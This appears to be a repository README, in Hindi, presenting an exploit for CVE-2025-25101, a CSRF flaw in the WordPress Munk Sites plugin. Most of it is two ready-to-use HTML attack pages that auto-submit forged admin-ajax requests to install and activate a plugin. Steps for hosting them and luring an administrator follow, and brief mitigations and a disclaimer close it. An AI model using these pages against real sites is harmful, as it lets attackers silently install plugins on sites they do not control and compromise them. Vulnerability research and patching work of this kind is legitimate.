
वर्डप्रेस Munk Sites प्लगइन <= 1.0.7 - CSRF से मनमाना प्लगइन इंस्टॉलेशन भेद्यता
CVE-2025-25101 MetricThemes Munk Sites प्लगइन के लिए WordPress में एक क्रॉस-साइट रिक्वेस्ट फोर्जरी (CSRF) भेद्यता है (संस्करण ≤ 1.0.7)। यह भेद्यता एक अप्रमाणित हमलावर को एक व्यवस्थापक को मनमानी प्लगइन स्थापित और सक्रिय करने के लिए मूर्ख बनाने की अनुमति देती है, जिससे संभावित रूप से रिमोट कोड निष्पादन (RCE) या वेबसाइट समझौता हो सकता है।
<= 1.0.7कोई भी संस्करण जहां प्लगइन सक्रिय है| स्कोर | गंभीरता | संस्करण | वेक्टर स्ट्रिंग |
|---|
| 9.6 | 🔥 क्रिटिकल | 3.1 | CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H |
Munk Sites प्लगइन में CSRF दोष एक हमलावर को लॉग-इन WordPress व्यवस्थापक को उनकी सहमति के बिना कोई भी WordPress प्लगइन स्थापित और सक्रिय करने के लिए मजबूर करने की अनुमति देता है।
यह एक असुरक्षित admin-ajax.php अनुरोध का शोषण करके किया जाता है जिसमें CSRF टोकन सत्यापन का अभाव है।
यह पेलोड पीड़ित को hello-world प्लगइन स्थापित करने के लिए मजबूर करता है।
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>CSRF Exploit - Plugin Installation</title>
<style>
body { font-family: Arial, sans-serif; text-align: center; background: #f4f4f4; padding: 20px; }
h1 { color: #d9534f; } h2 { color: #5bc0de; }
.output { margin-top: 20px; padding: 10px; background: white; box-shadow: 0 0 10px rgba(0, 0, 0, 0.1); }
.success { color: #5cb85c; font-weight: bold; }
</style>
</head>
<body onload="document.forms[0].submit()">
<h1>📌 CVE-2025-25101</h1>
<h2>CSRF Exploit - Install 'Hello World' Plugin</h2>
<h3>🚀 Exploit by: <b>Nxploit | Khaled Alenazi</b></h3>
<div class="output" id="output">🔄 Installing plugin...</div>
<form action="http://target.com/wp-admin/admin-ajax.php" method="GET">
<input type="hidden" name="action" value="cs_install_plugin">
<input type="hidden" name="plugin" value="hello-world">
</form>
<script>setTimeout(() => { document.getElementById("output").innerHTML = "<span class='success'>✅ Plugin installed successfully!</span>"; }, 5000);</script>
</body>
</html>
यह पेलोड पीड़ित को hello-world प्लगइन सक्रिय करने के लिए मजबूर करता है।
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>CSRF Exploit - Plugin Activation</title>
<style>
body { font-family: Arial, sans-serif; text-align: center; background: #f4f4f4; padding: 20px; }
h1 { color: #d9534f; } h2 { color: #f0ad4e; }
.output { margin-top: 20px; padding: 10px; background: white; box-shadow: 0 0 10px rgba(0, 0, 0, 0.1); }
.success { color: #5cb85c; font-weight: bold; }
</style>
</head>
<body onload="document.forms[0].submit()">
<h1>📌 CVE-2025-25101</h1>
<h2>CSRF Exploit - Activate 'Hello World' Plugin</h2>
<h3>🚀 Exploit by: <b>Nxploit | Khaled Alenazi</b></h3>
<div class="output" id="output">🔄 Activating plugin...</div>
<form action="http://target.com/wp-admin/admin-ajax.php" method="GET">
<input type="hidden" name="action" value="cs_active_plugin">
<input type="hidden" name="plugin" value="hello-world">
</form>
<script>setTimeout(() => { document.getElementById("output").innerHTML = "<span class='success'>✅ Plugin activated successfully!</span>"; }, 5000);</script>
</body>
</html>
install.html और activate.html) को हमलावर-नियंत्रित सर्वर पर होस्ट करें।install.html पर जाने के लिए मनाएं।activate.html पर जाने के लिए बरगलाएं।hello-world प्लगइन व्यवस्थापक की सहमति के बिना स्थापित और सक्रिय हो जाएगा!.htaccess या Nginx कॉन्फ़िगरेशन में सुरक्षा नियमों का उपयोग करके admin-ajax.php तक पहुंच प्रतिबंधित करें।wp_nonce_field() और check_admin_referer() का उपयोग करके CSRF सुरक्षा लागू करें।⚠️ यह एक्सप्लॉइट केवल शैक्षिक और सुरक्षा अनुसंधान उद्देश्यों के लिए है। ⚠️ स्पष्ट अनुमति के बिना सिस्टम के विरुद्ध अनधिकृत उपयोग अवैध है। ⚠️ लेखक इस कोड के किसी भी दुरुपयोग के लिए जिम्मेदार नहीं है।
यदि आपको यह शोध मूल्यवान लगता है, तो कृपया रिपॉजिटरी को ⭐ स्टार करने और नई भेद्यताओं की रिपोर्ट करके योगदान करने में संकोच न करें।
द्वारा: Nxploit | Khaled Alenazi